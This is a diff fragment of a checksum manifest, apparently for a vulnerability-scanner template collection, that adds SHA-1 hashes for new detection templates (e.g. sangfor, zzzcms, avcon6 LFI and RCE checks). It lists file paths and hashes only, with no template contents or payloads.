+http/vulnerabilities/other/avcon6-execl-lfi.yaml:d5a44d62cfc407229ce1133f241b9c37cde1e519 +http/vulnerabilities/other/avcon6-lfi.yaml:af636608a20ffff0c681b0d7cca60e6b1c42b34a http/vulnerabilities/other/bems-api-lfi.yaml:c634436e12e06ed1871ce7ab0555411c7c1f4bd0 http/vulnerabilities/other/beward-ipcamera-disclosure.yaml:8cd184ca124b57a8dae72a078c9c00773df884a4 http/vulnerabilities/other/bitrix-open-redirect.yaml:d07d85523c53212e00bca343aa56c45ae078136d @@ -6170,6 +6313,7 @@ http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:0845daaee668a666fd2 http/vulnerabilities/other/chamilo-lms-sqli.yaml:5fe0cff3f3f3c852fd14093b5659bc2719360c0e http/vulnerabilities/other/chamilo-lms-xss.yaml:4c83bd6add9efe5e05240bce3fd0f858d6ed19c3 http/vulnerabilities/other/ckan-dom-based-xss.yaml:b8b79109f77c1f61d4191f38c32814438d262623 +http/vulnerabilities/other/clodop-printer-lfi.yaml:fb9dd9be90813a7347752c35f6447881610b736a http/vulnerabilities/other/coldfusion-debug-xss.yaml:e95f8dac229f56be4ae422603ada8b5e586d7c94 http/vulnerabilities/other/commax-biometric-auth-bypass.yaml:f9ce7cefadd26aaaa56f381810439df363829593 http/vulnerabilities/other/commax-credentials-disclosure.yaml:0ca9da78f9254620e94a29e437c765ab79173a44 @@ -6189,6 +6333,7 @@ http/vulnerabilities/other/dotnetcms-sqli.yaml:af7f4950eaac888fa6bb40dc253f6c23f http/vulnerabilities/other/dss-download-fileread.yaml:fa2a70d76e4b6a402f135a3d5ad09404bd539e3f http/vulnerabilities/other/duomicms-sql-injection.yaml:9f839065f6dc2a1edfd4bf425dbf943f6a9ba670 http/vulnerabilities/other/dzzoffice-xss.yaml:7925b71b798fce655b43dfb18cf75246b5629cb6 +http/vulnerabilities/other/easyimage-downphp-lfi.yaml:8fabd3cd52bf007c918874a8e0c13e6e9499f96b http/vulnerabilities/other/ecshop-sqli.yaml:b4f5d54e8ada68281039d7f722e52ddf518a4c96 http/vulnerabilities/other/ecsimagingpacs-rce.yaml:0ae513b5158c949a41510c0ba7eeb6180f0bb8ce http/vulnerabilities/other/eibiz-lfi.yaml:47b6bb1e4f444de3eaac7dd2dccdae6cb74a5e4e @@ -6253,6 +6398,7 @@ http/vulnerabilities/other/keycloak-xss.yaml:d20e3322f3430593356ac31c1ba2b9a0d63 http/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:4a0dda044e05cda0742d803bc497b69fa89a5f0c http/vulnerabilities/other/kingsoft-v8-file-read.yaml:aa0e37be669e21c2f3a608952a0bd1c94394632f http/vulnerabilities/other/kiwitcms-json-rpc.yaml:04ed57277189ff7f95571626e9980dd6b1cfadae +http/vulnerabilities/other/kodak-network-lfi.yaml:d88bb8fad85354c8f837531c3936efad0b377ff1 http/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:d4cac1b72d69f601bdf6537be92a9304732eb322 http/vulnerabilities/other/laravel-filemanager-lfi.yaml:93c7a647675b6871fdd205791ba02386f3ffa2bb http/vulnerabilities/other/loancms-sqli.yaml:55fd04e78f84ba3657bbe9e2b1327d5cf68778f5 @@ -6324,6 +6470,9 @@ http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67 http/vulnerabilities/other/resin-viewfile-lfr.yaml:7de92f9c19448bcd34a9989dd162fa46334dd6e7 http/vulnerabilities/other/rockmongo-xss.yaml:758b23dabf3dfe4171b30ae387f273b25dba466c http/vulnerabilities/other/rundeck-log4j.yaml:f8b3929499e90a61ebd33b1d38aaa59c437f1c76 +http/vulnerabilities/other/sangfor-cphp-rce.yaml:bd4c5d106f68364176aef77bc77e2d6717c5e590 +http/vulnerabilities/other/sangfor-download-lfi.yaml:59f5b86ddcae473249635ef557de06891505bd3b +http/vulnerabilities/other/sangfor-sysuser-conf.yaml:825d22cfe7e5c41f0f78bd236c775577e32300fc http/vulnerabilities/other/sap-redirect.yaml:47a5370349446eee54ad22c333d902cd82c73e30 http/vulnerabilities/other/sar2html-rce.yaml:f1760b0bcbdfd892a53c31fadee6d698b6503c0f http/vulnerabilities/other/seacms-rce.yaml:eaa2ae8e9b835a93b7a091a91f083e519ed4603c @@ -6618,6 +6767,9 @@ http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:e7e8bf6bd2bc78efd9ceb6d04b5f0 http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:d81ad79707b746a46d8dbf3825df18da17aba5bf http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab +http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:867377dd72eed091ea11ee05778c06855a5aef2b +http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:68c6f8ed4ebd17880e69cb75ff46e4594f9b1274 +http/vulnerabilities/zzzcms/zzzcms-xss.yaml:026425b2b85ab06c5db42d543763a9d6cfcc8794 network/backdoor/backdoored-zte.yaml:1f2965cc0dedda1f861b7835e5778923b08c6a5f network/backdoor/vsftpd-backdoor.yaml:e3bd4879b5595dae69e0610aed33f24c77c28232 network/cves/2001/CVE-2001-1473.yaml:d7b8ad3248b716018e0c7ab5b39d65d442363af9 @@ -6757,7 +6909,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:59db62d00ce9a955d312bc64771f55a87581ec8e +templates-checksum.txt:6dc0677d1b832396c497d46ab8e0a827eb57d821 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f